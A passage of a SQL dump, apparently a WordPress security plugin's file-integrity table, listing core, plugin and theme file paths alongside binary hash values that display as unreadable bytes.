aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0Up�\0�.c*�a�','\'�]pn������v�\r>A���;¯P \Z(-��','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��+�����zg��','@u� |-�\ZK\Zbk�^��R4hM�Ψ����','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L��e�t\"pc(	�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW��	�!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tm�{$,����','A�Y����}�U=��2��\'\Z�� �Z�0�<�','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('M{�A��oxI�q','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�vP��v��p�(��','G���G��hF\r~�g��T7�۶SR�v3�','',0,'?'),('M�[\Z�2hT�	�K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('M��f���+���t�','wp-content/themes/magazine-hoot/include/admin/images/header-layout.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�}��n���߁o�E�','�g`��7x��0����ρҥ=���9܇�\Z','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^E�@�p�\'��?�','N�O�[wȐ��	��&Ќ�!P��Qe��s','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('N@-R{{��ւJ\n���','wp-content/themes/magazine-hoot/js/hoot.theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2������B��Z���','iN��V��7	H�lc! �5�ڏY&��\\�	�','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\"?.�i�!�qe�o�','ߟ�d��~o�K�C��ѰE��˛)5��.9�A','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N�����t3LX>SB	0','wp-content/themes/magazine-hoot/hybrid/extend/js/admin-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T!\n�I(�Wm=F�','��C,ک��t���gi����$~4\'�G���','',0,'?'),('N��a��⿙e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!T<zs�6�C�?r\r�','�hŽ�[��в�u�\0Jh=�$�6L)c^f��zb��','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����`�\0d���‘','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��׈','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;I�U`��t���',';�9�sM�lȴ[\ZZY��B�����{��Re','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�`�����kث=','g��<�������ƃ˂�s��{5Ϝq��6�','',0,'?'),('Or�O��\\_�o�chD','wp-content/themes/magazine-hoot/hybrid/inc/functions-i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y3�>�y@n�/�','dz��\"5{ަ�c�d{PK�|�$���&�~','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�\Z���&T;�ݫ��','c�tg�H���u����L=?q�u���EA','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lU�e�H�Y%U�n��','AK希T�YL�6��~8����w,9�ˉ+�R�f','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\\���@�ju��W�=','�%Z��j��\Za��� ��Dy��b����','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn	�fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P���Ps��+�W�$N','wp-content/themes/magazine-hoot/include/admin/images/premium-menuicons.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�7�t���Q0�C�R�','�?I�<�?5�Lpc�Q&���,Kn�A�.ē��','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ�{���97@�]տ','PP&`@�U��}�{�������_V��,HCV','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Հѷ������#','+B�0j$2f�j�i�\Z���)HٗO=�\\%�','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Q{�\'b �鮀�f','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/3_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E\\f�\r�Ev\nɫ�','(�E�\"��;�S \'�n�Ɏ�8(�MFM3bN����','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7	r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur�|,:]�_��#','d\0��\\w�|	��w��W?�3 gYaX~]�-�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi	�սq','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�^�p9Y\\\re*.�2',',/;�{�M,��z���+��o{�c�|u��b\"_Q','',0,'?'),('R\\�s)<���Ӿ(`�\n','wp-content/themes/magazine-hoot/include/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�[�K�R�eYZ�%�','�q��s8o�l%���H߱l+#U+�{�Ot�$>','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R��z��춝��g','wp-content/themes/magazine-hoot/hybrid/extend/includes/helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G$�;����<���C`[','�4B?d�T�ݒ\nsl�Y�ѥ\\�\rx�~,��	','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nv�>4��~,�aڛ858','�\ZKok����ӗi0˓���RI��c\0�Oh','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+�𙒽�C�w�C�쌑�)n�d','',0,'?'),('R��i�Ť�c�Pd�P-','wp-content/themes/magazine-hoot/include/admin/images/import-clickbutton.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��W@chr���ȍ{��','P\rdۂ��{\rk���~�C��d��#�ݕz','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��gRȺ#c�٩�','���?~�o,cy2�P��on��`����ϻ}u8:H','',0,'?'),('Slr��)�O�T�s\\R�i','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6K_Cf���H��c�',';�R�`5?���͡��h+�	9���h�+p���<','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`‹_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IF	�1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z 